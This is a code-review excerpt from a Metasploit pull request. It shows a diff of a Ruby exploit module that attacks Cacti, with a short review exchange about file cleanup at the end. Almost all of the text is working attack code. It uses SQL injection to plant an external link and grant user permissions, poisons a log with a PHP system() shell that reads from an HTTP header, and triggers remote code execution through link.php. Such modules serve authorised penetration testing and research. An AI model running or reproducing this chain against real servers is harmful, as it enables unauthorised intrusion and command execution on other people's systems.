modules/exploits/multi/http/cacti_pollers_sqli_rce.rb

```diff
@@ -0,0 +1,345 @@
+    get_ext_link_id
+    sqli.raw_run_sql(";insert into external_links (id,sortorder,enabled,contentfile,title,style) values (#{@ext_link_id},2,'on','#{log_file_path_lfi}','Log-#{rand_text_numeric(3..5)}','CONSOLE')")
+    @do_ext_link_cleanup = true
+
+    print_status('Getting the user ID and setting permissions (it might take a few minutes)')
+    user_id = sqli.run_sql("select id from user_auth where username='#{datastore['USERNAME']}'")
+    fail_with(Failure::NotFound, 'User ID not found') unless user_id =~ (/\A\d+\Z/)
+    sqli.raw_run_sql(";insert into user_auth_realm (realm_id,user_id) values (#{10000 + @ext_link_id},#{user_id})")
+    @do_perms_cleanup = true
+
+    print_status('Logging again to apply new settings and permissions')
+    # Keep a copy of the cookie_jar and the CSRF token to be used later by the cleanup routine and remove all cookies to login again.
+    # This is required since this new session will block after triggering the payload and we won't be able to reuse it to cleanup.
+    cookie_jar_bak = cookie_jar.clone
+    cookie_jar.clear
+    csrf_token_bak = @csrf_token
+    # Setting `@csrf_token` to nil will force `#do_login` to get a fresh CSRF token
+    @csrf_token = nil
+    fail_with(Failure::NoAccess, 'Login failure') unless do_login
+
+    print_status('Poisoning the log')
+    header_name = rand_text_alpha(1).upcase
+    sqli.raw_run_sql(" and updatexml(rand(),concat(CHAR(60),'?=system($_SERVER[\\'HTTP_#{header_name}\\']);?>',CHAR(126)),null)")
+
+    print_status('Triggering the payload')
+    # Expecting no response
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'link.php'),
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'headers' => {
+        header_name => payload.encoded
+      },
+      'vars_get' => {
+        'id' => @ext_link_id,
+        'headercontent' => 'true'
+      }
+    }, 0)
+
+    # Restore the cookie_jar and the CSRF token to run cleanup without being blocked
+    cookie_jar.clear
+    self.cookie_jar = cookie_jar_bak
+    @csrf_token = csrf_token_bak
+  end
+
+  def cleanup
+    super
+
+    if @do_ext_link_cleanup
+      print_status('Cleaning up external link using SQLi')
+      sqli.raw_run_sql(";delete from external_links where id=#{@ext_link_id}")
+    end
+
+    if @do_perms_cleanup
+      print_status('Cleaning up permissions using SQLi')
+      sqli.raw_run_sql(";delete from user_auth_realm where realm_id=#{10000 + @ext_link_id}")
+    end
+
+    if @do_settings_cleanup
+      print_status('Cleaning up the log path in `settings` table using SQLi')
+      sqli.raw_run_sql(";delete from settings where name='path_cactilog' and value='#{@log_file_path}'")
+      sqli.raw_run_sql(";update settings set name='path_cactilog' where name='#{@log_setting_name_bak}'")
+    end
+  end
+
+  def on_new_session(session)
+    super
+
+    print_status('Cleaning up log file')
+    session.run_cmd("rm #{@log_file_path}")
```

Comment:
I think we could leverage the `FileDropper` mixin to clean this file up.

Reply:
Yes, absolutely! Addressed in [81eba7a](https://github.com/rapid7/metasploit-framework/pull/18769/commits/81eba7a6e7e4ff810219e5a2f868f64be4d10b97)